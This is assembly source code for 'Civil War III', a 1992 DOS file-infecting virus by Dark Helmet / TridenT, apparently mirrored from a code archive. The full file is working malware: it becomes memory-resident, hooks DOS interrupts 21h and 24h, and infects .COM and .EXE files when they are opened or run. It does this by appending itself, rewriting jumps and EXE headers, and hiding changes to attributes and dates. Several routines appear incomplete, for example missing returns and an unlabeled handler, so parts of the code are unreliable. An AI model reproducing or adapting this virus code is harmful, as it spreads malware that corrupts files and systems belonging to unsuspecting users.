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synced 2025-02-11 17:32:03 +00:00
477 lines
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477 lines
12 KiB
; Civil War III, *
; *
; Assembled with Tasm 2.5 *
; (c) 1992 Dark Helmet / TridenT, The Netherlands *
; The author takes no responsibility for any damaged caused by this virus *
; *
; *
; Civil War... *
; *
; "For all I've seen has change my mind *
; But still the wars go on as the years go by *
; With no love for God or human rights *
; 'Cause all these dreams are swept aside *
; By bloody hands of the hypnotized *
; Who carry the cross of homicide *
; And history bears the scars of our civil war" *
; *
.Radix 16
Civ_War Segment
Model small
Assume cs:Civ_War, ds:Civ_War, es:Civ_War
org 100h
lenght equ offset last - start
virus_lenght equ lenght /16d
; A dummy file created only for the virus dropper
dummy: db 0e9h, 00h, 00h ; Jump + infection
; marker
; Here starts the virus code
start: call start_2 ; Make call to
; push IP on stack.
start_2: pop bp ; Get IP from stack.
sub bp, offset start_2
check_host: cmp cs:[host_file+bp],0Ch ; Check if the host
; file is a COM file.
jne exe_start ; Host file is an
; EXE file.
com_start: mov di,0100h ; Restore beginning
lea si,cs:[host_begin+bp] ; of the host file
mov cx,03h ; (first 6 bytes).
rep movsb
push cs ; New CS on stack.
mov ax,0100h ; New IP on stack.
push ax
jmp chk_install
exe_start: mov ax,cs:[old_cs+bp] ; Calculate new
mov bx,ax ; CS
mov ax,ds
add ax,bx
add ax,10h
push ax ; New CS on stack.
mov ax,cs:[old_ip+bp]
push ax ; New IP on stack.
push ds
push es
mov ah,0a0h ; check if virus already
int 21h ; resident
cmp ax,0003h ; check for virus_id
je abort
adjust_memory: push ds ; lower DS with 1
pop ax ; paragraf
dec ax
push ax
pop ds
cmp byte ptr ds:[0000],5a ; Check if last MCB.
jne abort ; If not last MCB end.
mov ax,ds:[0003] ; decrease memory size
sub ax,50h ; by about 1k
mov ds:[0003],ax
sub word ptr ds:[0012],50h
install_virus: mov bx,ax ; virus destination.
mov ax,es
add ax,bx
mov es,ax
mov cs:[v_segment+bp],es ; save virus segment
; for hooking interrupt
push cs ; DS points to segment
pop ds ; with virus
mov cx,lenght ; Virus lenght.
lea si,[start+bp] ; Start of virus.
lea di,es:0103h ; Where to copy virus
; to.
rep movsb ; move virus to
; new memory location.
hook_int21: cli ; hook int21h
mov ax,3521h ; get old int 21h
int 21h ; vector
mov ds,cs:[v_segment+bp]
mov ds:[old_21h],bx ; old vector in memory
mov ds:[old_21h+2],es
mov ax,ds ; INT 21, AX 2521
mov bx,ax ; bx segment new int21
mov dx, offset main_virus ; dx offset new int21
xor ax,ax
mov ds,ax
mov ds:[4*21h],dx ; offset int 21h
mov ds:[4*21h+2],bx ; seggment int 21h
abort: pop es
pop ds
retf ; continu with orginal
; programming
; This part of the virus will intercept the interuptvectors
cmp ah,0a0h ; check if virus ask
jne new_21h ; for virus_id
mov ax,0003h ; returns virus_id
new_21h: push ax
push bx
push cx
push dx
push ds
push es
push di
push sp
push bp
chk_open: cmp ah,3dh ; check if a file is
je chk_com ; opened
chk_exec: cmp ax,4b00h ; check if a file is
je chk_com ; executed
continu: pop bp
pop sp
pop di
pop es ; recover registers
pop ds
pop dx
pop cx
pop bx
pop ax
jmp dword ptr cs:[old_21h]
chk_com: mov cs:[name_seg],ds ; ds:dx = filename
mov cs:[name_off],dx
; check if extension
cld ; is .COM
mov di,dx
push ds
pop es
mov al,'.'
repne scasb
cmp word ptr es:[di],'OC'
jne chk_exe
cmp byte ptr es:[di+2],'M'
jne continu
jmp infect_com
chk_exe: cmp word ptr es:[di],'XE' ; check if extension
jne continu ; is .EXE
cmp byte ptr es:[di+2],'E'
jne continu
; This part will infect a EXE file
infect_exe: mov cs:[host_file],0Eh ; EXE marker
call int24h
call open_file ; open file
jc close_file ; Error?
call set_atributes
call get_date ; get file date/time
call chk_infect ; check if already
; infect
je close_file
mov ax,4200h ; go to filestart
call mov_point
mov ah,3fh ; read exe header
mov cx,18h
lea dx,[head_buffer] ; store header in
call do_int21h ; HEAD_BUFFER
call EXE_inf ; call for infection
; of EXE file
call save_date
jmp close_file
; This part will infect COM files
infect_com: mov cs:[host_file],0Ch ; COM marker
call int24h
call open_file ; open file
jc close_file ; error?
call set_atributes
call get_date ; get file date/time
call chk_infect ; check if already
; infect
je close_file ; already infected
mov ax,4200h ; get beginning of file
call mov_point
mov ah,3fh
mov cx,03h
push cs
pop ds
lea dx,[host_begin]
call do_int21h
mov ax,4200h ; get file lenght
call mov_point
mov ax,4202h
call mov_point
sub ax,03h ; subtract 3 bytes for
mov cs:[lenght_file],ax ; jump instruction
; later
call write_jmp ; write jmp instruction
call write_vir ; write virus
call save_date
close_file: mov bx,cs:[handle] ; close file
mov ah,3eh
call do_int21h
restore_int24h: mov dx,cs:[old_24h] ; restore int 24h
mov ds,cs:[old_24h+2]
mov ax,2524h
call do_int21h
jmp continu ; continu with
; interrupt
new_24h: mov al,3
; Procedure's used in the virus
int24h: push cs
pop ds
mov ax,3524h ; hook int24h
call do_int21h
mov cs:[old_24h],bx
mov cs:[old_24h+2],es
mov dx,offset new_24h
mov ax,2524h
call do_int21h
set_atributes: mov ax,4300h ; clear file
mov ds,cs:[name_seg] ; atributes
mov dx,cs:[name_off]
call do_int21h
and cl,0feh
mov ax,4301h
call do_int21h
get_date: mov ax,5700h ; get original
call do_int21h ; time and date
mov cs:[date],dx ; of file
mov cs:[time],cx
save_date: mov bx,cs:[handle]
mov dx,cs:[date]
mov cx,cs:[time]
mov ax,5701h
call do_int21h
open_file: mov ds,cs:[name_seg] ; open file
mov dx,cs:[name_off] ; with pointer to
mov ax,3d02h ; name in ds:dx
call do_int21h
mov cs:[handle],ax
mov bx,ax
chk_infect: push cs
pop ds
mov ax,4202h ; file-pointer
xor cx,cx ; to infection marker
sub cx,01h
xor dx,dx
sub dx,02h
mov bx,[handle]
call do_int21h
mov ah,3f
mov cx,02h
lea dx,[file_id]
call do_int21h
mov al, byte ptr cs:[file_id]
mov ah, byte ptr cs:[file_id]+1
cmp ax,[id_marker]
mov_point: push cs
pop ds
mov bx,cs:[handle] ; move filepointer
xor cx,cx
xor dx,dx
call cs:do_int21h
write_jmp: push cs
pop ds
mov ax,4200h ; write JUMP
call mov_point ; instruction
mov ah,40h ; at begin of file
mov cx,01h
lea dx,cs:[jump]
call do_int21h
mov ah,40h ; write offset
mov cx,02h ; for JUMP
lea dx,cs:[lenght_file]
call do_int21h
write_vir: push cs
pop ds
mov ax,4202h ; write actual
call mov_point ; virus at end of
mov ah,40h ; file
mov cx,lenght
mov dx,103h
call do_int21h
EXE_inf: mov ax,word ptr cs:[head_buffer+14h] ; store old IP
mov cs:[old_ip],ax
mov ax,word ptr cs:[head_buffer+16h] ; store old CS
mov cs:[old_cs],ax
new_CS_IP: mov ax,4200h ; get filelenght
call mov_point
mov ax,4202h
call mov_point
mov bx,10h ; divide filelenght
div bx ; by 16
sub ax,word ptr cs:[head_buffer+08h]
mov cs:[new_cs],ax ; store new CS
mov cs:[new_ip],dx ; store new IP
call write_vir ; write virus to end
; of file
new_size: mov ax,4200h ; Get new filesize
call mov_point ; and calculate
mov ax,4202h ; PAGE and OFFSET
call mov_point ; size for in the
mov bx,0200h ; EXE buffer.
div bx
cmp dx,0000h
jne niet_nul
jmp doorgaan
niet_nul: inc ax
doorgaan: mov word ptr cs:[head_buffer+02h],dx ; new mod lengh
mov word ptr cs:[head_buffer+04h],ax ; new page lenght
mov ax,cs:[new_ip]
mov word ptr cs:[head_buffer+14h],ax ; new IP
mov ax,cs:[new_cs]
mov word ptr cs:[head_buffer+16h],ax ; new CS
mov word ptr cs:[head_buffer+0E],ax ; new SS
mov word ptr cs:[head_buffer+10],1000 ; new SP
mov ax,4200h
call mov_point
mov ah,40h ; write new
mov bx,cs:[handle] ; EXE header
mov cx,18h
lea dx,cs:[head_buffer]
call do_int21h
do_int21h: pushf
call dword ptr cs:[old_21h]
; D A T A
v_name db "Civil War III v1.0, (c) Dec 1992, [ DH / TridenT] "
old_21h dw 00h,00h
old_24h dw 00h,00h
host_file db 0Ch
host_begin db 90h,0cdh,20h
jump db 0e9h
name_seg dw ?
name_off dw ?
v_segment dw ?
handle dw ?
lenght_file dw ?
date dw ?
time dw ?
head_buffer db 18 dup (?)
file_id dw 0000
old_cs dw ?
old_ip dw ?
new_cs dw ?
new_ip dw ?
Id_Marker dw "GR"
last dw "GR"
civ_war ends
end dummy